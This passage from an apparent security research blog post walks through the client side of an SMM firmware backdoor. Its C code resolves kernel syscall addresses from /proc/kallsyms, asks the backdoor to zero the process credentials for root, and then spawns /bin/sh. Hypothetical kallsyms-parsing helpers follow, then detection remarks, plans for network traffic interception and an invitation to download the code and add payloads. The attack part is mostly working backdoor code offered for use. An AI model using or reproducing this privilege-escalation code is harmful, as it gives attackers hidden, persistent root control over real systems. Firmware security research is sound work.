                    printf("strtoull() ERROR %d\n", errno);
                    return errno; 
                }

                if (addr == 0)
                {
                    printf("ERROR: Unable to resolve %s() address\n", func);
                    return EINVAL;
                }

                printf("%s() address is 0x%llx...\n", func, addr);            

                // call target syscalls code to be sure that it's not swapped out by kernel
                getuid();
                getgid();
                geteuid();            
                getegid();

                // ask the backdoor to set cred field value to 0
                ret = smm_call(BACKDOOR_PRIVESC, addr, 0);

                if (ret != 0)
                {
                    printf("ERROR: Backdoor returns 0x%x\n", ret);
                    return ret;
                }
            }            

            // check for root privileges
            if (getuid() == 0 && geteuid() == 0 &&
                getgid() == 0 && getegid() == 0)
            {
                printf("SUCCESS\n");
 
                // run command shell
                execl("/bin/sh", "sh", NULL);
            } 
            else
            {
                printf("FAILS\n");
                return EINVAL;
            }
        }
        else
        {            
            int i = 0, code = 0;
            char command[MAX_COMMAND_LEN];

            /* 
                Find desired syscalls addresses in /proc/kallsyms and pass them 
                to the same program via command line arguments.
            */

            char *functions[] = { "sys_getuid", "sys_geteuid", 
                                  "sys_getgid", "sys_getegid", NULL };                                              

            printf("Getting root...\n");

            sprintf(command, "%s --privesc ", argv[0]);

            for (i = 0; functions[i]; i++)
            {
                char *func = functions[i];            

                sprintf(
                    command + strlen(command), 
                    "0x`cat /proc/kallsyms | grep '%s$' | awk '{print $1}'` %s ", func, func
                );                
            }    
            
            code = system(command);
            if (code != 0)
            {
                printf("ERROR: Command \"%s\" returns 0x%x\n", command, code);
                return code;
            }       
        }
    }
    else
    {
        // ... skipped ...
    }

    return ret;
}
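
The client above resolves addresses by shelling out to cat, grep and awk. As a possible alternative, the same lookup can be sketched in plain C, since each /proc/kallsyms line has the form "address type name". This is not what the published client does: parse_kallsyms_line() and lookup_symbol() are hypothetical helpers, and the address in the usage note is made up.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
    Parse one "address type name" line. Returns 1 and stores the address
    if the symbol name equals `wanted`, 0 otherwise.
*/
int parse_kallsyms_line(const char *line, const char *wanted, unsigned long long *addr)
{
    unsigned long long value = 0;
    char type = 0;
    char name[128];

    assert(line != NULL && wanted != NULL && addr != NULL);

    if (sscanf(line, "%llx %c %127s", &value, &type, name) != 3)
    {
        // malformed line
        return 0;
    }

    // exact match only, so "sys_getuid" does not match "sys_getuid16"
    if (strcmp(name, wanted) != 0)
    {
        return 0;
    }

    *addr = value;
    return 1;
}

/*
    Scan a kallsyms-formatted file (normally /proc/kallsyms) for a symbol.
    Returns 1 on success, 0 if the file can't be opened or the symbol is missing.
*/
int lookup_symbol(const char *path, const char *wanted, unsigned long long *addr)
{
    char line[256];
    int found = 0;
    FILE *f = NULL;

    assert(path != NULL && wanted != NULL && addr != NULL);

    if ((f = fopen(path, "r")) == NULL)
    {
        return 0;
    }

    while (!found && fgets(line, sizeof(line), f))
    {
        found = parse_kallsyms_line(line, wanted, addr);
    }

    fclose(f);
    return found;
}
```

For a line such as "ffffffff8106c3d0 T sys_getuid" the parser stores 0xffffffff8106c3d0. As in the original client, a resolved address of 0 still has to be treated as a failure, because the kernel may hide symbol addresses from unprivileged readers.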

Now, when we compile this backdoor client and run the binary with the --privesc argument, it gives us a root shell. Example of privilege escalation on Debian Wheezy with the 3.2.60 kernel (in the top console window you can see SMI dispatch debug messages that were received from the backdoor via the COM port):



Conclusion


It's hard to detect such a nice SMM backdoor from a running operating system: SMRAM is not accessible, and the only thing that can be done easily is to check the hardware configuration for suspicious enabled SMI sources that are normally not used by firmware (like APIC timers, etc.). However, that's a good topic for another tool and another post.

Is there any chance of meeting SMM malware in the real world? Well, the chances are greater than zero: for example, leaked NSA documents mention the SOUFFLETROUGH project, a BIOS implant for Juniper firewalls that takes advantage of SMM to hide its code from the OS.

As for improvements to my SMM backdoor, it would definitely be interesting to implement network traffic interception and injection. I believe it will not be very hard to achieve this by hooking the NIC driver execution flow using the I/O instruction restart CPU feature. I'm planning to dig in this direction some time in the future.

End of the story. Download the source code, test backdoor on your own hardware, add some custom payloads, have fun and tell people about your findings :)